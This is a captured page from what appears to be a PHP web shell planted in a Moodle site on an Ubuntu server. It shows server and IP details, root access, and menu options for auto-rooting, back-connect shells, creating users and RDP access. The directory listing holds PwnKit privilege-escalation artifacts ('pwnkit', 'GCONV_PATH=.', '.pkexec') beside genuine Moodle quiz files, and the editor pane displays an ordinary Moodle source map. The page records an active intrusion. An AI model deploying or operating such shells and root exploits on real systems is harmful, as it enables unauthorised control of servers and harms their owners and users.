Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
quiz /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_question_modal_launcher.mi...
931
B
-rwxrwxrwx
add_question_modal_launcher.mi...
3.77
KB
-rwxrwxrwx
add_random_form.min.js
2.14
KB
-rwxrwxrwx
add_random_form.min.js.map
9.35
KB
-rwxrwxrwx
add_random_question.min.js
772
B
-rwxrwxrwx
add_random_question.min.js.map
2.61
KB
-rwxrwxrwx
modal_add_random_question.min....
4.53
KB
-rwxrwxrwx
modal_add_random_question.min....
13.67
KB
-rwxrwxrwx
modal_quiz_question_bank.min.j...
3.92
KB
-rwxrwxrwx
modal_quiz_question_bank.min.j...
13.92
KB
-rwxrwxrwx
preflightcheck.min.js
1.73
KB
-rwxrwxrwx
preflightcheck.min.js.map
5.82
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
quizquestionbank.min.js
612
B
-rwxrwxrwx
quizquestionbank.min.js.map
1.86
KB
-rwxrwxrwx
random_question_form_preview.m...
2.89
KB
-rwxrwxrwx
random_question_form_preview.m...
11.29
KB
-rwxrwxrwx
repaginate.min.js
678
B
-rwxrwxrwx
repaginate.min.js.map
2
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add_random_question.min.js.map
{"version":3,"file":"add_random_question.min.js","sources":["../src/add_random_question.js"],"sourcesContent":["// This file is part of Moodle - http://moodle.org/\n//\n// Moodle is free software: you can redistribute it and/or modify\n// it under the terms of the GNU General Public License as published by\n// the Free Software Foundation, either version 3 of the License, or\n// (at your option) any later version.\n//\n// Moodle is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License\n// along with Moodle. If not, see <http://www.gnu.org/licenses/>.\n\n/**\n * Initialise the add random question modal on the quiz page.\n *\n * @module mod_quiz/add_random_question\n * @package mod_quiz\n * @copyright 2018 Ryan Wyllie <ryan@moodle.com>\n * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later\n */\ndefine(\n [\n 'mod_quiz/add_question_modal_launcher',\n 'mod_quiz/modal_add_random_question'\n ],\n function(\n AddQuestionModalLauncher,\n ModalAddRandomQuestion\n ) {\n\n return {\n /**\n * Create the add random question modal.\n *\n * @param {int} contextId Current context id.\n * @param {string} category Category id and category context id comma separated.\n * @param {string} returnUrl URL to return to after form submission.\n * @param {int} cmid Current course module id.\n */\n init: function(contextId, category, returnUrl, cmid) {\n AddQuestionModalLauncher.init(\n ModalAddRandomQuestion.TYPE,\n '.menu [data-action=\"addarandomquestion\"]',\n contextId,\n // Additional values that should be set before the modal is shown.\n function(triggerElement, modal) {\n modal.setCategory(category);\n modal.setReturnUrl(returnUrl);\n modal.setCMID(cmid);\n }\n );\n }\n };\n});\n"],"names":["define","AddQuestionModalLauncher","ModalAddRandomQuestion","init","contextId","category","returnUrl","cmid","TYPE","triggerElement","modal","setCategory","setReturnUrl","setCMID"],"mappings":";;;;;;;;AAuBAA,sCACI,CACI,uCACA,uCAEJ,SACIC,yBACAC,8BAGG,CASHC,KAAM,SAASC,UAAWC,SAAUC,UAAWC,MAC3CN,yBAAyBE,KACrBD,uBAAuBM,KACvB,2CACAJ,WAEA,SAASK,eAAgBC,OACrBA,MAAMC,YAAYN,UAClBK,MAAME,aAAaN,WACnBI,MAAMG,QAAQN"}
Close